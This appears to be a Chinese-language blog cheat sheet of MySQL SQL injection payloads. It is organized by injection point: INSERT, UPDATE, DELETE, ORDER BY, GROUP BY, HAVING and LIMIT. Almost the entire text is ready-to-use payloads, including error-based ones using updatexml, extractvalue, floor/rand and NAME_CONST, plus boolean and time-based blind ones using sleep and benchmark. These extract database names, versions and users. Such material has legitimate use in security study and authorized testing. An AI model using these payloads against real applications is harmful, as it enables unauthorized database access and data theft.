Mysql 下 Insert、Update、Delete、Order By、Group By注入

標籤：

Insert:

文法：INSERT INTO table_name (列1, 列2,...) VALUES (值1, 值2,....)

報錯注入：

insert into test(id,name,pass) values (6,‘xiaozi‘ or updatexml(1,concat(0x7e,(database()),0x7e),0) or ‘‘, ‘Nervo‘);

insert into test(id,name,pass) values (6,‘xiaozi‘ or extractvalue(1,concat(0x7e,database())) or ‘‘, ‘Nervo‘);

盲註：

//根據or之間的運算式是否成立來進行盲注
‘or 1=1 or ‘ //插入的測試語句直接當成sql語句執行，並把儲存傳回值，運算式成立，返回結果為1
‘or 1=2 or ‘ //運算式不成立，返回結果為0
‘ or exists(select * from information_schema.tables) or‘ //返回結果為1
aaa‘ or length(database())=11 or ‘//返回正確
aaa‘ or mid(database(),1,1)=‘t‘ or‘//返回正確
aaa‘ or mid(database(),1,11)=‘test‘ or ‘//返回正確

insert into test(id,name,pass) values (2,‘mis1‘,‘‘or   ascii(mid(database(),1,1))=116 or‘‘)

 

時間盲註：

insert into test(id,name,pass) values (2,‘mis1‘,‘‘or  if(mid(database(),1,1)=‘a‘,sleep(10),0) or‘‘)

 

Update:

update test set pass=‘baidu‘ or updatexml(1,concat(0x7e,(version()),0x7e),0) or‘‘WHERE id=2 and name=‘0‘;

update test set pass=‘baidu‘ or extractvalue(1,concat(0x7e,database())) or‘‘WHERE id=2 and name=‘0‘;

 

Delete:

DELETE FROM test WHERE id=2 or updatexml(1,concat(0x7e,(version()),0x7e),0) or‘‘;

 DELETE FROM test WHERE id=2 or extractvalue(1,concat(0x7e,database())) or‘‘;

 

 

Order by:

order by [id]---【注入點】

 SELECT username FROM users WHERE isadmin = 0 GROUP BY username ORDER BY 1  and (select count(*) from information_schema.columns group by concat(version(),0x27202020,floor(rand(0)*2-1)))

order by [id] desc/asc  ---【注入點】

 SELECT username FROM users WHERE isadmin = 0 GROUP BY username ORDER BY 1 desc ,(select count(*) from users group by concat(version(),0x27202020,floor(rand(0)*2-1))) 

　　

Limit 0,1：

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 【注入點】

報錯注入：

mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);  ERROR 1105 (HY000): XPATH syntax error: ‘:5.5.41-0ubuntu0.14.04.1‘ 

如果注入點不是報錯的，還可以使用 time-based 的注入，payload 如下：

SELECT username FROM users WHERE isadmin = 0 limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,(IF(MID(database(),1,1) LIKE ‘w‘, BENCHMARK(5000000,SHA1(1)),5)))),1);  

　　

Group by:

group by username --【注入點】

SELECT username FROM users WHERE isadmin = 0 GROUP BY username and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

　　

Having :

Having 1=1 --【注入點】

SELECT username FROM users WHERE isadmin = 0 GROUP BY username  having 1=1 and (select count(*) from information_schema.columns group by concat(version(),0x27202020,floor(rand(0)*2-1)))

　

Mysql報錯注入：

1、通過floor報錯

and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

2、ExtractValue

and extractvalue(1, concat(0x5c,(select user())))

3、UpdateXml

and 1=(updatexml(1,concat(0x3a,(select user())),1))

4、利用NAME_CONST注入

 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

5、join報錯注入

mysql> select *  from(select * from users a join users b)c;
mysql> select *  from(select * from users a join users b using(id))c;

mysql> select *  from(select * from users a join users b using(id,name))c;

 

Mysql盲註：

#select * from test where id =2 and length(version())=6
#select * from test where id =2 and ascii(substring(version(),7,1))>1

#select * from test where id =2 and length(database())=4
#select * from test where id =2 and ascii(mid(database(),4,1))=116

#select * from test where id =2 and (select length(version()))=6
#select * from test where id =2 and (select count(*) from test)=3

 

Mysql時間盲註：

#select * from test where id =2 and if(ascii(substring(user(),1,1))=114,benchmark(10000000,SHA1(1)),0)
#select * from test where id =2 and if(ascii(substring(user(),1,1))=114,sleep(1),0)

#select * from test where id =2 and if(substring(user(),1,1)=‘r‘,sleep(5),0)
#select * from test where id =2 and if(substring(user(),1,1)=char(11),sleep(5),0)

 

 

參考資料：

1、 Mysql報錯注入原理分析(count()、rand()、group by)

2、關於Mysql注入過程中的五種報錯方式及具體利用案例

3、利用insert，update和delete注入擷取資料

4、Testing Injection

5、MySQL注入總結

 

Mysql 下 Insert、Update、Delete、Order By、Group By注入